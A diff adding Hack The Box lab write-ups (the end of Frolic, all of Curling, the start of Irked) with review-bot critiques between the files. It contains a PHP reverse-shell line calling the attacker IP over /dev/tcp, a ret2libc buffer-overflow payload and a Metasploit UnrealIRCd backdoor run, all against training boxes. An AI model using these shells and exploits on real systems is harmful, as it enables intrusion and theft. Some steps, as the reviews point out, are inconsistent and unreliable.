+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Frolic] → ls
+ exploit.py msf rockyou.txt zipfile.zip
+ index.php payload rop
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Frolic] → python2 -m SimpleHTTPServer 9001
+ Serving HTTP on 0.0.0.0 port 9001 ...
+ 10.10.10.111 - - [05/Dec/2019 12:40:58] "GET /payload HTTP/1.1" 200 -
+
+
+
+ $wget http://10.10.14.48:9001/payload
+ --2019-12-05 12:42:22-- http://10.10.14.48:9001/payload
+ Connecting to 10.10.14.48:9001... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 0 [application/octet-stream]
+ Saving to: ‘payload.1’
+
+ payload.1 [ <=> ] 0 --.-KB/s in 0s
+
+ 2019-12-05 12:40:58 (0.00 B/s) - ‘payload.1’ saved
+
+ $ /home/ayush/.binary/rop $(cat payload.1)
+ /home/ayush/.binary/rop $(cat payload.1)
+
+ # cat /root/root.txt
+ cat root.txt
+ 85XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+Another even quicker way to get the root flag is to pass the addresses of SYSTEM, exit and /bin/sh directly to the rop binary itself.
+
+
+
+ $ ./rop $(python -c 'print("a"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')
+ ./rop $(python -c 'print("a"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')
+
+ # whoami
+ whoami
+ root
+
+ # cat /root/root.txt
+ cat /root/root.txt
+ 85XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
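Review bot: the privilege-escalation half of this writeup cannot be reproduced from what is shown. The libc exfiltration step says "we use either curl or wget to download the libc library locally" but is illustrated only with `nc -lvnp 4444 > libc`: the sending command on the target is missing, the listener reuses port 4444 that the meterpreter handler is already bound to, and the connection arrives at `10.10.14.23` while the attacker host is `10.10.14.48` everywhere else in the transcript. The `one_gadget` output lists two constraints (`esi is the GOT address of libc`, `[esp+0x28] == NULL`) that are never checked before the gadget is used; either show them holding at the crash site in gdb or say that they happened to hold. The wget transfer of the payload reports `Length: 0`, saves an empty `payload.1`, and has a saved-at timestamp earlier than the request, yet the next command is `/home/ayush/.binary/rop $(cat payload.1)` followed by a root shell, so that capture should be redone. The final ret2libc variant hardcodes `\xa0\x3d\xe5\xb7`, `\xd0\x79\xe4\xb7` and `\x0b\x4a\xf7\xb7` for system, exit and "/bin/sh" without showing how they were resolved from the target's libc (resolving them on the box is what `randomize_va_space = 0` makes reliable, and that is also why the `ldd` base `0xb7e19000` can be reused in `exploit.py`), and "SYSTEM" should read `system()`. Smaller fixes: "SUID bit active.$" has a stray `$`, "Now that we have" is a dangling sentence before the gdb session, "cd /home/ayush" is echoed as "cd ayush", and "the rop binary possess" should be "possesses".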
diff --git a/Easy/24.md b/Easy/24.md
new file mode 100644
index 0000000..e30377f
--- /dev/null
+++ b/Easy/24.md
@@ -0,0 +1,436 @@
+# Curling Writeup
+
+
+
+## Introduction :
+
+Curling is an easy Linux box that was released back in October 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → nmap -F 10.10.10.150 --top-ports 65535
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-05 15:48 CET
+ Nmap scan report for 10.10.10.150
+ Host is up (0.038s latency).
+ Not shown: 8318 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 8.68 seconds
+
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → nmap -sC -sV -p22,80 10.10.10.150
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-05 15:51 CET
+ Nmap scan report for 10.10.10.150
+ Host is up (0.039s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
+ | 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
+ |_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ |_http-generator: Joomla! - Open Source Content Management
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: Home
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.41 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap picked up the 80th port running a Joomla! webservice. We will run a dirsearch command in the background while we start to enumerate this port.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → dirsearch -u http://10.10.10.150/ -r -e php -t 50 -x 403
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → searchsploit Joomla! | wc -l
+ 1421
+
+
+Joomla! is a well known service with more than a thousand exploits available.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → dirsearch -u http://10.10.10.150/
+ No extension specified. You must specify at least one extension or try using default extension list.
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → dirsearch -u http://10.10.10.150/ -r -e php -t 50 -x 403
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php | HTTP method: get | Threads: 50 | Wordlist size: 6027 | Recursion level: 1
+
+ Error Log: /root/.dirsearch/logs/errors-19-12-05_15-52-05.log
+
+ Target: http://10.10.10.150/
+
+ [15:52:05] Starting:
+ [15:52:12] 301 - 320B - /administrator -> http://10.10.10.150/administrator/
+ [15:52:12] 200 - 5KB - /administrator/
+ [15:52:12] 301 - 325B - /administrator/logs -> http://10.10.10.150/administrator/logs/
+ [15:52:12] 200 - 5KB - /administrator/index.php
+ [15:52:14] 301 - 310B - /bin -> http://10.10.10.150/bin/
+ [15:52:14] 200 - 31B - /bin/
+ [15:52:14] 301 - 312B - /cache -> http://10.10.10.150/cache/
+ [15:52:14] 200 - 31B - /cache/
+ [15:52:15] 301 - 317B - /components -> http://10.10.10.150/components/
+ [15:52:15] 200 - 0B - /configuration.php
+ [15:52:18] 200 - 3KB - /htaccess.txt
+ [15:52:18] 301 - 313B - /images -> http://10.10.10.150/images/
+ [15:52:18] 200 - 31B - /includes/
+ [15:52:18] 301 - 315B - /includes -> http://10.10.10.150/includes/
+ [15:52:18] 200 - 14KB - /index.php
+ [15:52:19] 301 - 315B - /language -> http://10.10.10.150/language/
+ [15:52:19] 301 - 316B - /libraries -> http://10.10.10.150/libraries/
+ [15:52:19] 200 - 18KB - /LICENSE.txt
+ [15:52:20] 301 - 312B - /media -> http://10.10.10.150/media/
+ [15:52:21] 301 - 314B - /modules -> http://10.10.10.150/modules/
+ [15:52:23] 301 - 314B - /plugins -> http://10.10.10.150/plugins/
+ [15:52:23] 200 - 5KB - /README.txt
+ [15:52:26] 301 - 316B - /templates -> http://10.10.10.150/templates/
+ [15:52:26] 200 - 31B - /templates/
+ [15:52:26] 200 - 31B - /tmp/
+ [15:52:26] 301 - 310B - /tmp -> http://10.10.10.150/tmp/
+ [15:52:27] 200 - 2KB - /web.config.txt
+ [15:52:28] Starting: administrator/
+ [15:52:35] 301 - 326B - /administrator/cache -> http://10.10.10.150/administrator/cache/
+ [15:52:35] 200 - 31B - /administrator/cache/
+ [15:52:36] 301 - 331B - /administrator/components -> http://10.10.10.150/administrator/components/
+ [15:52:39] 301 - 325B - /administrator/help -> http://10.10.10.150/administrator/help/
+ [15:52:39] 200 - 1KB - /administrator/help/
+ [15:52:40] 301 - 329B - /administrator/includes -> http://10.10.10.150/administrator/includes/
+ [15:52:40] 200 - 2KB - /administrator/includes/
+ [15:52:40] 200 - 5KB - /administrator/index.php
+ [15:52:40] 200 - 5KB - /administrator/index.php/login/
+ [15:52:41] 301 - 329B - /administrator/language -> http://10.10.10.150/administrator/language/
+ [15:52:41] 301 - 325B - /administrator/logs -> http://10.10.10.150/administrator/logs/
+ [15:52:41] 200 - 31B - /administrator/logs/
+ [15:52:42] 301 - 328B - /administrator/modules -> http://10.10.10.150/administrator/modules/
+ [15:52:47] 301 - 330B - /administrator/templates -> http://10.10.10.150/administrator/templates/
+ [15:52:47] 200 - 1KB - /administrator/templates/
+ [15:52:49] Starting: bin/
+ [15:53:01] 200 - 31B - /bin/index.md
+ [15:53:10] Starting: cache/
+ [15:53:23] 200 - 31B - /cache/index.md
+ [15:53:31] Starting: components/
+ [15:53:44] 200 - 31B - /components/index.md
+ [15:53:53] Starting: images/
+ [15:54:00] 301 - 321B - /images/banners -> http://10.10.10.150/images/banners/
+ [15:54:00] 200 - 2KB - /images/banners/
+ [15:54:05] 301 - 321B - /images/headers -> http://10.10.10.150/images/headers/
+ [15:54:05] 200 - 31B - /images/index.md
+ [15:54:14] Starting: includes/
+ [15:54:27] 200 - 31B - /includes/index.md
+ [15:54:36] Starting: language/
+ [15:54:48] 200 - 31B - /language/index.md
+ [15:54:57] Starting: libraries/
+ [15:55:06] 301 - 320B - /libraries/cms -> http://10.10.10.150/libraries/cms/
+ [15:55:06] 200 - 1KB - /libraries/cms/
+ [15:55:10] 200 - 0B - /libraries/import.php
+ [15:55:10] 200 - 31B - /libraries/index.md
+ [15:55:10] 301 - 323B - /libraries/joomla -> http://10.10.10.150/libraries/joomla/
+ [15:55:17] 301 - 320B - /libraries/src -> http://10.10.10.150/libraries/src/
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_namespaces.php
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_psr4.php
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_static.php
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/ClassLoader.php
+ [15:55:18] 200 - 1KB - /libraries/vendor/composer/LICENSE
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_classmap.php
+ [15:55:18] 200 - 0B - /libraries/vendor/autoload.php
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_real.php
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_files.php
+ [15:55:19] 200 - 47KB - /libraries/vendor/composer/installed.json
+ [15:55:19] Starting: media/
+ [15:55:28] 301 - 316B - /media/cms -> http://10.10.10.150/media/cms/
+ [15:55:28] 200 - 941B - /media/cms/
+ [15:55:28] 301 - 321B - /media/contacts -> http://10.10.10.150/media/contacts/
+ [15:55:32] 200 - 31B - /media/index.md
+ [15:55:34] 301 - 318B - /media/media -> http://10.10.10.150/media/media/
+ [15:55:39] 301 - 319B - /media/system -> http://10.10.10.150/media/system/
+ [15:55:39] 200 - 1KB - /media/system/
+ [15:55:41] Starting: modules/
+ [15:55:53] 200 - 31B - /modules/index.md
+ [15:56:03] Starting: plugins/
+ CTRL+C detected: Pausing threads, please wait...
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → curl -sk http://10.10.10.150/ | grep Floris
+ <****p>- Floris <****/p>
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → curl -sk http://10.10.10.150/ | grep secret
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → curl -sk http://10.10.10.150/secret.txt
+ Q3VybGluZzIwMTgh
+
+
+Looking at the sourcecode of the index page of the box, we see that the username Floris comes up. At the bottom of the index sourcecode we see a commented line "secret.txt" Browsing to this /secret.txt file we get seem to get a strong password which could be base64-encoded : Q3VybGluZzIwMTgh
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → curl -sk http://10.10.10.150/secret.txt | base64 -d
+ Curling2018!
+
+
+Seems like we were right ! We now have credentials to work with. Our dirsearch command found the /administrator webpage earlier, Browsing onto it we find the joomla! login page, onto which we will try our freshly-acquired credentials : Floris:Curling2018!
+
+ 
+
+And we are logged in ! Now we navigate into Extensions > Templates > Options and set public and superuser permissions to allowed.
+
+
+
+Once that's done we will save the options and navigate to the Beez3 template details in order to edit it's index php file.
+
+
+
+Replace the entire php code with a reverse php shell one liner that will send back a reverse shell connection to our local machine (10.10.14.48) at the 9001 port.
+
+
+ <****?php
+ echo("nihilist WAS HERE");
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.48/9001 0>&1'");
+
+
+We will use a terminal in order to recieve the incoming shell connection using the nc command with the -lvnp flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → nc -lvnp 9001
+
+
+We then click "preview template" which will run the infected index.php file and send us a reverse shell connection.
+
+
+
+As you can see, the echo() statement is being executed, which displays our string. Naturally, it also execute the reverse shell one liner.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → nc -lvnp 9001
+ Connection from 10.10.10.150:51798
+ bash: cannot set terminal process group (1319): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@curling:/var/www/html$ whoami
+ whoami
+ www-data
+ www-data@curling:/var/www/html$ uname -a
+ uname -a
+ Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+
+
+And we are logged in as www-data ! now let's see if we can print out the user flag.
+
+
+ www-data@curling:/var/www/html$ cd /home/floris
+ cd /home/floris
+ www-data@curling:/home/floris$ cat user.txt
+ cat user.txt
+ cat: user.txt: Permission denied
+
+
+It seems like we are not logged in with enough permissions. We will need to escalate privileges in order to gain the user access. Poking around the box from within our low-privileged shell, we find an interesting file named "password_backup"
+
+
+ www-data@curling:/home/floris$ ls
+ ls
+ admin-area
+ password_backup
+ user.txt
+ www-data@curling:/home/floris$ file password_backup
+ file password_backup
+ password_backup: ASCII text
+ www-data@curling:/home/floris$ cat password_backup
+ cat password_backup
+ 00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H..;
+ 00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4
+ 00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960 N...n.T.#.@%...`
+ 00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000 ......z.@......
+ 00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800 ..i.4hdi...9.h..
+ 00000050: 000f 51a0 0064 681a 069e a190 0000 0034 ..Q..dh........4
+ 00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0 i...5.n......J..
+ 00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78 .h...*..}y..<~.x
+ 00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931 .>...sVT.zH....1
+ 00000090: c856 921b 1221 3385 6046 a2dd c173 0d22 .V...!3.`F...s."
+ 000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290 ..n....7j:X.d.R.
+ 000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503 .k./... ....)p..
+ 000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843 7..;.....9...P.C
+ 000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c .Y.P...HB....*..
+ 000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090 .G.. .U@r..rE8P.
+ 000000f0: 819b bb48 ...H
+
+
+We see that it is a hexdump file. We save it locally and decode it using the xxd command with the -r flag.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → nano password_backup
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → ls
+ password_backup
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → cat password_backup | xxd -r
+ BZh91AY&SY;���H���A��P)ava�:4N���nT#�@%�`
+ ��z�@�i�4hdi���9�h�Q�dh����4i�5n���Jh��*��}y.�<~�x�> �sVT�zH�ߢ�1�V��`F���"��n�
+ ۇ7j:X�dR��k�� ���)p�7۫;���9��PC�Y�P �HB��* ��G� �U@r�rE8P����H#
+
+
+That's weird, we seem to get a binary file once we decode the hexdump, we will save it as "BACKUP" and we'll run the file command to find out what it actually is.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → xxd -r password_backup > BACKUP
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → file BACKUP
+ BACKUP: bzip2 compressed data, block size = 900k
+
+
+We seem to get a bzip2 file ! let's give it it's proper extension and then try to decompress it with the bzip2 command along with it's -d flag.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → mv BACKUP BACKUP.bz2
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → bzip2 -d BACKUP.bz2
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → ls
+ BACKUP password_backup
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → file BACKUP
+ BACKUP: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size modulo 2^32 141
+
+
+Now we seem to end up with a gzip file ! Let's give it it's proper extension and now try to decompress it with the gunzip command.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → mv BACKUP BACKUP.gz
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → gunzip BACKUP.gz
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → ls
+ BACKUP password_backup
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → file BACKUP
+ BACKUP: bzip2 compressed data, block size = 900k
+
+
+Again a bzip2 file ! let's decompress it once again.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → mv BACKUP BACKUP.bz2
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → bzip2 -d BACKUP.bz2
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → ls
+ BACKUP password_backup
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → file BACKUP
+ BACKUP: POSIX tar archive (GNU)
+
+
+Now it's a tar archive... to decompress it we will use the tar command with the -xvf flags.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → mv BACKUP BACKUP.tar
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → tar -xvf BACKUP.tar
+ password.txt
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → cat password.txt
+ 5d<****wdCbdZu)|hChXll
+
+And there we go ! we have a password to work with now. We will use it to login as the user floris through a ssh connection.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → ssh floris@10.10.10.150
+ The authenticity of host '10.10.10.150 (10.10.10.150)' can't be established.
+ ECDSA key fingerprint is SHA256:o1Cqn+GlxiPRiKhany4ZMStLp3t9ePE9GjscsUsEjWM.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.150' (ECDSA) to the list of known hosts.
+ floris@10.10.10.150's password:
+ Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Fri Dec 6 10:26:56 UTC 2019
+
+ System load: 0.0 Processes: 169
+ Usage of /: 46.2% of 9.78GB Users logged in: 0
+ Memory usage: 21% IP address for ens33: 10.10.10.150
+ Swap usage: 0%
+
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Mon May 28 17:00:48 2018 from 192.168.1.71
+ floris@curling:~$ uname -a && whoami
+ Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+ floris
+ floris@curling:~$ cat /home/floris/user.txt
+ 65XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we are logged in ! We now have the necessary premissions to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Onto the machine there is a cronjob running every minute that is executing something inside the admin-area folder.
+
+
+ floris@curling:~$ ls -l
+ total 12
+ drwxr-x--- 2 root floris 4096 May 22 2018 admin-area
+ -rw-r--r-- 1 floris floris 1076 May 22 2018 password_backup
+ -rw-r----- 1 floris floris 33 May 22 2018 user.txt
+ floris@curling:~$ cd admin-area
+ floris@curling:~/admin-area$ ls -l
+ total 20
+ -rw-rw---- 1 root floris 25 Dec 6 10:34 input
+ -rw-rw---- 1 root floris 14236 Dec 6 10:34 report
+
+
+Within that folder we see that there are 2 files : input and report
+
+
+ floris@curling:~/admin-area$ cat input
+ url = "http://127.0.0.1"
+ floris@curling:~/admin-area$ cat output
+
+
+It seems like the input file is the command, and report is the output of the command. Let's not do something too complicated, we'll just change the URL to the root flag's location.
+
+
+ floris@curling:~/admin-area$ echo 'url = file:///root/root.txt' > input
+
+
+Wait exactly one minute and then print out the now-updated report file :
+
+
+ floris@curling:~/admin-area$ cat report
+ 82XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
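Review bot: the reverse-shell payload pasted into the Beez3 `index.php`, `exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.48/9001 0>&1'");`, cannot produce the callback shown afterwards as written, because bash parses `> &` with a space as `>` followed by the `&` control operator and fails with a syntax error; the redirection must be the single token `>&` (or `&>`), so the rendered line should be corrected. The enumeration prose claims "At the bottom of the index sourcecode we see a commented line 'secret.txt'", but the command given for it, `curl -sk http://10.10.10.150/ | grep secret`, returns nothing; either show the actual HTML comment or use a case-insensitive grep. In the root section the "cronjob running every minute" is asserted with no evidence (no crontab or process listing appears; only the 10:34 timestamps on `input` and `report` hint at it), and the transcript runs `cat output` in a directory that contains only `input` and `report`. It would also help to state that `url = "http://127.0.0.1"` is curl's `-K` config-file syntax, which is why swapping in `url = file:///root/root.txt` makes the job read the flag into `report`. Setting template-editing permissions to allowed for Public as well as Super Users is broader than the attack needs and should be justified or dropped. Finally, several lines carry HTML-escaping residue from extraction (`<****p>- Floris <****/p>`, `<****?php`, and the recovered password `5d<****wdCbdZu)|hChXll`), the `dirsearch -u http://10.10.10.150/ -r -e php -t 50 -x 403` command appears twice, and "recieve", "premissions" and "it's proper extension" (its) need fixing.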
diff --git a/Easy/25.md b/Easy/25.md
new file mode 100644
index 0000000..1b3cb96
--- /dev/null
+++ b/Easy/25.md
@@ -0,0 +1,335 @@
+# Irked Writeup
+
+
+
+## Introduction :
+
+Irked is an easy Linux box that was released back in November 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 85.171.153.138 ] [ ~/_HTB/ ]
+ → nmap -F 10.10.10.117 --top-ports 65000 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 16:11 CET
+ Nmap scan report for 10.10.10.117
+ Host is up (0.037s latency).
+ Not shown: 8315 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 111/tcp open rpcbind
+ 6697/tcp open ircs-u
+ 8067/tcp open infi-async
+
+ Nmap done: 1 IP address (1 host up) scanned in 57.80 seconds
+
+ λ nihilist [ 85.171.153.138 ] [ ~/_HTB/ ]
+ → nmap 10.10.10.117 -sCV -p22,80,111,6697,8097
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 16:13 CET
+ Nmap scan report for 10.10.10.117
+ Host is up (0.034s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
+ | ssh-hostkey:
+ | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
+ | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
+ | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
+ |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
+ 80/tcp open http Apache httpd 2.4.10 ((Debian))
+ |_http-server-header: Apache/2.4.10 (Debian)
+ |_http-title: Site doesn't have a title (text/html).
+ 111/tcp open rpcbind 2-4 (RPC #100000)
+ | rpcinfo:
+ | program version port/proto service
+ | 100000 2,3,4 111/tcp rpcbind
+ | 100000 2,3,4 111/udp rpcbind
+ | 100000 3,4 111/tcp6 rpcbind
+ | 100000 3,4 111/udp6 rpcbind
+ | 100024 1 42952/tcp status
+ | 100024 1 43551/udp6 status
+ | 100024 1 47932/udp status
+ |_ 100024 1 56558/tcp6 status
+ 6697/tcp open irc UnrealIRCd
+ 8097/tcp closed sac
+ Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 74.13 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan seems to have picked up UnrealIRCd on port 6697. Browsing to the 80th port which is running apache httpd 2.4.10, we are greeted with a simple image that gives us yet another hint speculating that we should work with the IRC part of this box.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → curl -sk http://10.10.10.117/
+ <****img src=irked.jpg> <****br> <****b> <****center>IRC is almost working! <****/b> <****/center>
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → searchsploit UnrealIRCd
+ ------------------------------------------------------------- -------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------------------------- -------------------------------
+ UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
+ UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
+ UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl
+ UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
+ ------------------------------------------------------------- -------------------------------
+ Shellcodes: No Result
+
+We seeem to have a few exploits to work with. most notably the first one which is available for metasploit, let's fire up msfconsole and see if we can do anything there.
+
+
+ msf5 > search UnrealIRCd
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
+
+
+ msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
+ msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
+
+ Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 6667 yes The target port (TCP)
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic Target
+
+
+ msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.10.10.117
+ RHOSTS => 10.10.10.117
+ msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
+ RPORT => 6697
+ msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
+
+
+We hit exploit and see if we get any result.
+
+
+ msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
+
+ [*] Started reverse TCP double handler on 10.10.14.48:4444
+ [*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
+ :irked.htb NOTICE AUTH :*** Looking up your hostname...
+ [*] 10.10.10.117:6697 - Sending backdoor command...
+ [*] Accepted the first client connection...
+ [*] Accepted the second client connection...
+ [*] Command: echo 2AGs6oeXBUrCqprk;
+ [*] Writing to socket A
+ [*] Writing to socket B
+ [*] Reading from sockets...
+ [*] Reading from socket A
+ [*] A: "2AGs6oeXBUrCqprk\r\n"
+ [*] Matching...
+ [*] B is input...
+ [*] Command shell session 1 opened (10.10.14.48:4444 -> 10.10.10.117:39782) at 2019-12-06 16:22:40 +0100
+
+ whoami
+ ircd
+
+ which python
+ /usr/bin/python
+
+
+and we are logged in as ircd ! Now, since python is available for us on the box, we will use a python one-liner using the pty module in order to spawn a nicer prompt. Once that's done we'll try to see if we can find the user flag.
+
+
+ python -c 'import pty; pty.spawn("/bin/bash")'
+ ircd@irked:~/Unreal3.2$ uname -a
+ uname -a
+ Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux
+
+ ircd@irked:/home/djmardov/Documents$ cat /home/djmardov/Documents/user.txt
+ cat /home/djmardov/Documents/user.txt
+ cat: /home/djmardov/Documents/user.txt: Permission denied
+
+
+We are logged in as ircd, however we do not have enough permissions to print out the user flag located in /home/djmardov/Documents/ . Poking around within the same folder, we seem to find a hidden .backup file.
+
+
+ ircd@irked:/home/djmardov/Documents$ ls -la
+ ls -la
+ total 16
